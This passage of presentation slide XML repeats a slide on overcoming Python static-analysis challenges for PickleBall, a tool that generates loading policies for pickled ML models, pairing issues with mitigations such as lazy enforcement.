        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Overcoming Python Analysis Challenges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="834" name="Google Shape;834;p68"/>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835" name="Google Shape;835;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879300" y="934275"/>
            <a:ext cx="7385400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Challenge:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Python is a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>dynamic language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but policies are generated </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>statically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="836" name="Google Shape;836;p68"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419100" y="1875075"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2723550"/>
                <a:gridCol w="3931925"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Issue</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Mitigation</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="803525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Incomplete path analysis of the model creating program → </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>missing types </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>incomplete policies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PickleBall is robust to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>missing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> but </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>unused</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> callables through </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en"/>
                        <a:t>lazy enforcement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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40" name="Shape 840"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="841" name="Google Shape;841;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Overcoming Python Analysis Challenges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="842" name="Google Shape;842;p69"/>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843" name="Google Shape;843;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879300" y="934275"/>
            <a:ext cx="7385400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Challenge:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Python is a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>dynamic language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but policies are generated </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>statically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="844" name="Google Shape;844;p69"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419100" y="1875075"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2723550"/>
                <a:gridCol w="3931925"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Issue</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Mitigation</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="803525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Incomplete path analysis of the model creating program → </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>missing types </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>incomplete policies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PickleBall is robust to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>missing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> but </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>unused</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> callables through </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en"/>
                        <a:t>lazy enforcement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="845" name="Google Shape;845;p69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200925" y="2284625"/>
            <a:ext cx="1542900" cy="869700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Leverages pattern in ML models.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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49" name="Shape 849"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="850" name="Google Shape;850;p70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Overcoming Python Analysis Challenges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="851" name="Google Shape;851;p70"/>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852" name="Google Shape;852;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879300" y="934275"/>
            <a:ext cx="7385400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Challenge:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> Python is a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>dynamic language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> but policies are generated </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>statically</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="853" name="Google Shape;853;p70"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419100" y="1875075"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2723550"/>
                <a:gridCol w="3931925"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Issue</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>Mitigation</a:t>
                      </a:r>
                      <a:endParaRPr b="1"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="803525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Incomplete path analysis of the model creating program → </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>missing types </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>incomplete policies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PickleBall is robust to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>missing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> but </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>unused</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> callables through </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en"/>
                        <a:t>lazy enforcement</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
              <a:tr h="803525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>Over-approximate type recovery → </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>loose policies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>PickleBall </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="1" lang="en"/>
                        <a:t>separates</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en"/>
                        <a:t>allowed imports</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t> from </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en"/>
                      </a:br>
                      <a:r>
                        <a:rPr i="1" lang="en"/>
                        <a:t>allowed invocations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="854" name="Google Shape;854;p70"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200925" y="2284625"/>
            <a:ext cx="1542900" cy="869700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Leverages pattern in ML models.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p: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58" name="Shape 858"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="859" name="Google Shape;859;p71"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Overcoming Python Analysis Challenges</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="860" name="Google Shape;860;p71"/>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861" name="Google Shape;861;p71"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="879300" y="934275"/>
            <a:ext cx="7385400" cy="525600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
